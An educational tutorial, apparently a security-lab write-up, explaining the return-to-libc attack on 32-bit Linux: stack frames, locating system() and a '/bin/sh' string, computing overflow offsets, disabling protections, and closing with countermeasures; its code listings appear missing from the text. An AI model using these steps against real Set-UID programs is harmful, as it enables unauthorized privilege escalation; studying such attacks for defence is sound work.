By using buffer overflow attack, attacker can cause a program to jump to shellcode and execute it. To prevent this, some operating systems, such as Fedora Linux, allow system administrators to make stacks non-executable; therefore, jumping to the shellcode will cause the program to fail.
Unfortunately, the above protection scheme is not fool-proof. There exists another type of attacks, the return-to-libc attack, which does not need an executable stack; it does not even use shell code. Instead, it causes the vulnerable program to jump to some existing code, such as the system()
function in the libc
library, which is already loaded into the memory.
system
functionThe system
function is a function of libc
library. The way it work is simple. First it invoke new shell process, then it passes its first argument as the command of this new shell. The new shell then execute this command.
What make the system
vulnerable is that the effective user ID of the invoke shell is the same with its parent process. Therefore, if we call system("/bin/sh")
in a privileged program, the invoked shell will have privileged permission, and then the command executed by it will also have privileged permission. For example, malicious user can call system("/bin/sh")
in a Set-UID program to invoke a privileged shell and use it to harm our system.
Every function has its own space and this space has structure. This space is called activation record. The structure of the activation record is simple. We will placed our origin at the ebp
pointer. The ebp
pointer to the previous ebp
value. Right above the ebp
is the return address, then comes the first argument of the function, then the second, the third, etc. Right below the ebp
is the first local variable, then the second, the third, etc.
For example, if we have this function
Then its activation record when the function is executed will look like this picture below:
To insert an argument for malicious function into memory, we need to know exactly how a function memory will allocated as well as deallocated. To achieve this, instruction often call a piece of code when entering and exiting a function, such of that is called function prologue and epilogue.
Function prologue: This assembly code will be called every time a function is invoked:
Before these code is run, the return address (denoted as RA
) has been pushed into the stack and the stack pointer esp
were pointing to this address. Next, the first instruction pushl %ebp
will push the value of previous frame pointer ebp
(frame pointer of the caller) into stack, so when the function returns, the caller's frame pointer can be recovered. After that, the second instruction now set the frame pointer ebp
to current frame, which mean the value of the stack pointer esp
. The third instruction move stack pointer esp
by bytes to preserve the function's local variable space.
Function epilogue: like the prologue, function epilogue is called every time the function return:
This is the inverse the prologue does, so the previous context can be restored. The first instruction move the stack pointer to frame pointer, which is the end of stack. Next instruction restore ebp
to its previous value. The last instruction pips the return address from the stack and then jumps to it.
There is a region in the memory where plenty of code can be found. It is the region for the standard C library functions. In Linux, the library is called libc
, which is a dynamic link library. Most programs use the functions inside the libc
library, so before these programs start running, the operating system will load the libc
library into memory.
So which function in libc
can help attacker achieve their malicious goal? Several such functions exist inside libc
, the easiest one to use is system()
function. system()
function simply invoke a new shell and executes the string argument it is passed by that shell. At this time, we just need to pass the string "/bin/sh"
to system()
and it will spawn new privileged shell since our parent process is a Set-UID program. Besides the system()
function, there exists a lot of difference function that can do harm to our system, such as execv()
function, setuid()
function, etc.
Since the return-to-libc attack on 64-bit machine is much more difficult than on the 32-bit one, we decide to make a demonstration on 32-bit machine for simplicity.
Assume that we have the following program:
This program is vulnerable. First, it read byte from the file named badfile
. Then, it pass the string str
into bof
function. After that,str
is copied into a function variable buffer
. However, buffer
has just 12
memory space, therefore the overflow will happen.
Assume that the program has been compiled with option -z noexecstack
(which mean the stack is turned non-executable), so we cannot insert a shellcode and jump to it. Here is where the return-to-libc attack come. The attack will come with step:
system()
function"/bin/sh"
badfile
content and perform the attackFor doing this experiment, some countermeasures need to be turned off.
/bin/sh
: In Ubuntu 20.04, the /bin/sh
symbolic link points to the /bin/dash
shell.The dash
shell has a countermeasure that prevents itself from being executed in a Set-UID process. Therefore, we have to link the /bin/sh
to /bin/zsh
system()
functionIn Linux, thelibc
library is loaded into program memory at runtime. When the memory address randomization is turned off, the library's address in one program is remained unchanged no matter how many time you run it (but it can differ between programs). Therefore, we can easily find out the address of the system()
using debugging tool such as gdb
.
First, we create an empty badfile
file for debugging:
Next, we compile a file with debug flag, remember to add option -m32
to compile with 32-bit architecture and other option for turn off coutermeasures:
Then, we make a a program Set-UID program. It should be noted that even for the same program, if we change it from a Set-UID program to a non-Set-UID program, the libc library may not be loaded into the same location. Therefore, when we debug the program, we need to debug the target Set-UID program:
After that, we just need to debug a program, set a breakpoint at main
function, run the program and print out the address:
"/bin/sh"
Now we just have address of system()
function, next we will find out the address of its argument - a string "/bin/sh"
- since we want to call system("/bin/sh")
to invoke a privileged shell.
There are many ways to achieve this goal and we choose a environment variable method. Let us define a new shell variable MYSHELL="/bin/sh"
and mark it as export for turning it into environment variable of program.
The location of this variable in the memory can be found out easily using the following program:
Compile the code above into a binary called prtenv
. Remember that this program name must have same number of letters as the target program (here retlib
program) since the name of a program will be pushed into stack before environment variables, therefore different length of names can cause different addresses of environment variables in the program:
Run the program, we will have address of our needed string:
First, we should know the distance from the buffer
to the ebp
pointer. We can achieve this easily by debug the program:
Next, we know that the return address is placed right after ebp
, so we will put it at the 24 + 4 = 28
-th character of the string.
After the function epilogue of bof
is called, the stack pointer will be at the address right above where the return address was stored. Then, it jump to the function prologue of system()
function, at this time the previousebp
is added to stack and move esp
by bytes downward. The second isntruction of prologue now point the ebp
to esp
. At that point, based on the activation record structure, we know that before ebp
is the return address and before the return address is the function argument, from first to last. By that, we conclude the "/bin/sh"
placed in buffer
is 28 + 4 + 4 = 36
-th character.
The program will jump to an invalid address after we run the system function, unless we specify the return address for system
function. Therefore, we need to find the address of the exit
function in the program (the same way as finding system
function address), then put it at the 28 + 4 = 32
-th byte of the character.
The above analysis can be visualize by this picture.
badfile
content and perform the attackThe last thing we have to do is to construct the badfile
content based on our analysis.
We will use a Python program to generate it:
The last thing we have to do is just run the program and enjoy the result:
There are lot of things to counter this attack.
First one is address space randomization, the OS can take advantage of this to make the starting address of heap and stack changed every time you run the program. Therefore, it is much harder to guess the address of system()
function and other addresses.
Second one is Stack-Guard to prevent buffer overflows implemented by the gcc
compiler. In the presence of this protection, buffer overflow attacks do not work.
Next, the /bin/dash
shell has a countermeasure that prevents itself from being executed in a Set-UID process. If dash
executed in a Set-UID process, it immediately changes the effective user ID to the process's real userID, essentially dropping its privilege.
The last one is ASCII armoring. With this, all the system libraries (e.g. libc) addresses contain a NULL
byte (0x00
). So when a string is read with string-based function like strcpy
, it will terminate at this NULL
bytes, prevent the overflow attack.